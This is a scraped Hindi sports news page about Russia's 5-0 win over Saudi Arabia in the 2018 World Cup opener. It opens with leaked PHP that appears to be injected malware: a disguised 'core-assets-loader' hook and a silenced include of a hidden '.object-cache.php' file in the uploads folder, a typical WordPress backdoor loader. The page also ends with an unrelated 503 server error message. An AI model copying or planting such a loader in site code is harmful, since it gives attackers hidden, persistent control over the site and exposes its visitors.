add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सऊदी अरब को 5-0 से रौंदने के बाद रातों रात खलनायक से नायक बन गए रूसी खिलाड़ी – SOCH INDIA
Menu

खेल
सऊदी अरब को 5-0 से रौंदने के बाद रातों रात खलनायक से नायक बन गए रूसी खिलाड़ी

nobanner

फीफा वर्ल्ड कप 2018 के ओपनिंग सरेमनी को लेकर जहां कई लोगों ने शिकायत की तो वहीं दूसरी तरफ रूस ने अपने पहले ही मैच में धमाकेदार जीत दर्ज की. रूस ने फीफा वर्ल्ड कप के पहले मैच में सऊदी अरब को 5-0 से हराकर स्टेडियम में मौजूद अपने राष्ट्रपति को तो खुश किया ही साथ में उन फैंस का भी धन्यवाद किया जिन्होंने अपनी टीम को सपोर्ट करने के लिए स्टेडियम में शिरकत की थी. इस मैच से एक बात तो तय हो गई कि रातों रातों रात खलनायक से नायक बन गए और फिलहाल टीम की क्षमता पर सवाल खड़े करने वालों के भी मुंह बंद हो गए.

सऊदी अरब को 5-0 से रौंदा

विश्व कप के मेजबान ने लुजनिकी स्टेडियम में अपने विरोधी टीम पर किसी तरह का रहम नहीं दिखाया और 80 हजार दर्शकों को खुशी मनाने का पूरा मौका दिया. रूसी टीम की यह इस साल पहली जीत है जिसने उसके खिलाड़ियों को भी नायक बना दिया. राष्ट्रपति व्लादीमीर पुतिन से लेकर सीनेटर और स्थानीय नेताओं ने सोवियत संघ के टूटने के बाद रूस की विश्व कप में सबसे बड़ी जीत के लिये कोच स्टेनिसलाव चेरेचेसोव और टीम को बधाई दी.

राष्ट्रपति ने कोच को फोन कर दी बधाई

रूसी कोच ने कहा, ‘‘राष्ट्रपति ने मुझे फोन करके बधाई दी. उन्होंने कहा कि हम जिस तरह से खेल रहे हैं वैसा खेल आगे भी जारी रखें.’’ वहीं रूस के अखबारों में भी टीम के बेहतरीन प्रदर्शन की जमकर तारीफ की गई है. मैच से पहले मीडिया रूस की क्षमता पर संदेह जता रहा था क्योंकि पिछले आठ महीने में टीम ने एक भी जीत दर्ज नहीं की थी और विश्व कप अभ्यास मैचों में उसने केवल एक गोल दागा था. यही नहीं उसके चार प्रमुख खिलाड़ी चोटिल होने के कारण विश्व कप में नहीं खेल रहे हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.